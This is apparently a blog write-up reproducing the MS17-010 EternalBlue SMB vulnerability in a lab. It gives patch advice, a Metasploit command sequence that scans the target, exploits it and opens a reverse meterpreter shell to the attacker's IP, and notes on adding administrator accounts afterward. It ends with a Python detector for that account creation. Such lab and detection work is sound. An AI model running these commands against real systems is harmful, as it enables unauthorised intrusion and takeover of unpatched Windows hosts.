MS17-010 Eternal Blue vulnerability reproduction

0x00 Vulnerability introduction

"Eternal Blue" dates to the evening of April 14, 2017. It exploits a vulnerability in the Windows SMB service to obtain the highest level of privilege on the system.
On May 12, 2017, criminals adapted "Eternal Blue" to produce the WannaCry ransomware, which hit university campus networks, large enterprise intranets and government private networks, and demanded high ransoms in exchange for decrypting and restoring files.

0x01 Vulnerability principle

Eternal Blue is an exploit for an SMB service vulnerability from the Equation Group's attack framework. The vulnerability allows an attacker to execute arbitrary code on the target system.

0x02 Affected versions

Currently known affected versions of Windows include, but are not limited to:
Windows NT,
Windows 2000,
Windows XP,
Windows 2003,
Windows Vista,
Windows 7,
Windows 8,
Windows 2008,
Windows 2008 R2,
Windows Server 2012 SP0.

0x03 Vulnerability fix

Microsoft released the MS17-010 patch on March 14, 2017, which fixes the vulnerability used by the "Eternal Blue" attack, so be sure to install Windows system patches promptly. Do not casually open attachments with doc, rtf and similar suffixes. If machines on the intranet share the same account and password, change the passwords as soon as possible. For computers that are currently powered off, make sure the password has been changed and the patch installed before connecting them to the network. An "Eternal Blue" vulnerability repair tool can also be downloaded to fix the vulnerability.

0x04 Lab environment

Attacker: Kali-Linux-2019.4-vmware-amd64 (IP: 192.168.139.153)
Target: Windows 7 x64 (IP: 192.168.139.140)

0x05 Reproducing the vulnerability

[msfconsole] ---- start msf
[search ms17_010] ---- list the matching modules
[use auxiliary/scanner/smb/smb_ms17_010] ---- select the scanner module that checks whether hosts are vulnerable
[set rhosts 192.168.139.140] ---- set the IP address of the host to scan
[exploit] ---- run the scan
[use exploit/windows/smb/ms17_010_eternalblue] ---- select the attack module
[show options] ---- view the parameters that need to be set
[set rhosts 192.168.139.140] ---- set the IP address of the attacked host
[set lhost 192.168.139.153] ---- set the IP address of the attacker
[set threads 512] ---- set the number of threads
[set payload windows/x64/meterpreter/reverse_tcp] ---- set the reverse-connection payload
[exploit] ---- begin the attack


[shell]
[whoami]
[systeminfo]
[ipconfig]
From here you can add a user, change passwords, and add the account to the Administrators group.
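
Seen from the defender's side, the last step leaves a trace in the Windows Security log. The following added example (not part of the original post) flags a local account that is created (event 4720) and then added to the Administrators group (event 4732) within minutes, and rates it high when the actor is SYSTEM, the identity a shell obtained this way runs as. The record layout, field names, host name and 10-minute window are assumptions, and the sample events are constructed.

```python
from datetime import datetime, timedelta

SYSTEM_SID = "S-1-5-18"        # LocalSystem
ADMINS_SID = "S-1-5-32-544"    # BUILTIN\Administrators
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed sample records (not from the page). Field names are a
# hypothetical normalised form of Security events 4720 and 4732.
EVENTS = [
    # SYSTEM creates an account and promotes it 8 seconds later
    {"time": "2020-01-04T10:02:11", "id": 4720, "host": "WIN7-LAB",
     "actor_sid": SYSTEM_SID, "account_sid": "S-1-5-21-1-2-3-1005", "account": "labuser"},
    {"time": "2020-01-04T10:02:19", "id": 4732, "host": "WIN7-LAB",
     "actor_sid": SYSTEM_SID, "account_sid": "S-1-5-21-1-2-3-1005", "group_sid": ADMINS_SID},
    # A named administrator does the same thing interactively
    {"time": "2020-01-04T11:30:00", "id": 4720, "host": "WIN7-LAB",
     "actor_sid": "S-1-5-21-1-2-3-500", "account_sid": "S-1-5-21-1-2-3-1006", "account": "newhire"},
    {"time": "2020-01-04T11:31:00", "id": 4732, "host": "WIN7-LAB",
     "actor_sid": "S-1-5-21-1-2-3-500", "account_sid": "S-1-5-21-1-2-3-1006", "group_sid": ADMINS_SID},
    # Long-standing account added to Administrators: no recent 4720, no alert
    {"time": "2020-01-04T12:00:00", "id": 4732, "host": "WIN7-LAB",
     "actor_sid": "S-1-5-21-1-2-3-500", "account_sid": "S-1-5-21-1-2-3-1001", "group_sid": ADMINS_SID},
]

def find_suspicious_admin_creation(events, window=WINDOW):
    """Return one alert per account created and made an administrator within `window`."""
    created = {}  # (host, account SID) -> (creation time, creation event)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[(ev["host"], ev["account_sid"])] = (ts, ev)
        elif ev["id"] == 4732 and ev["group_sid"] == ADMINS_SID:
            hit = created.get((ev["host"], ev["account_sid"]))
            if hit and ts - hit[0] <= window:
                by_system = SYSTEM_SID in (hit[1]["actor_sid"], ev["actor_sid"])
                alerts.append({"host": ev["host"], "account": hit[1]["account"],
                               "seconds": int((ts - hit[0]).total_seconds()),
                               "severity": "high" if by_system else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_suspicious_admin_creation(EVENTS):
        print(alert)
```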



Origin blog.csdn.net/qq_41901122/article/details/103832915